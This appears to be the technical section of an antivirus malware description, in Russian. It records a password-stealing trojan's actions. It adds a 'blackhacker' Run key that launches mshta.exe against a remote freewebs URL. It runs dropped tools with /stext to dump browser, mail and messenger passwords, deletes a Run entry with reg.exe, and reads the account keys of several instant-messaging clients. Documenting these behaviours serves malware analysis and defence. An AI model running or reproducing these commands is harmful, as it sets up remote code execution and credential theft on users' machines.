Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'blackhacker' = '<SYSTEM32>\mshta.exe http://www.freewebs.com/pccoppath/lnk.htm'
- '%TEMP%\strun.exe' /stext %TEMP%\strun.txt
- '%TEMP%\mailpv.exe' /stext %TEMP%\mailpv.txt
- '%TEMP%\msp.exe' /stext %TEMP%\msn.txt
- '%TEMP%\ie.exe' /stext %TEMP%\ie.txt
- '<SYSTEM32>\reg.exe' delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ /v temp /f
- '<SYSTEM32>\reg.exe' add Hklm\Software\Microsoft\Windows\CurrentVersion\Run\ /v blackhacker /t reg_sz /d "<SYSTEM32>\mshta.exe http://www.fr###ebs.com/pccoppath/lnk.htm" /f
- [<HKLM>\Software\Mirabilis\ICQ\NewOwners]
- [<HKCU>\Software\Yahoo\Pager]
- [<HKCU>\Software\Google\Google Talk\Accounts]
- [<HKCU>\Software\Mirabilis\ICQ\NewOwners]
- [<HKCU>\Software\Microsoft\IdentityCRL]
- [<HKLM>\Software\Miranda]
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian]
- [<HKCU>\Software\Microsoft\MessengerService]
- [<HKCU>\Software\Microsoft\MSNMessenger]
- %TEMP%\ie.txt
- %TEMP%\mailpv.txt
- %TEMP%\strun.txt
- %TEMP%\mailpv.exe
- %TEMP%\ie.exe
- %TEMP%\msp.exe
- <SYSTEM32>\mswinsck.ocx
- %TEMP%\strun.exe
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'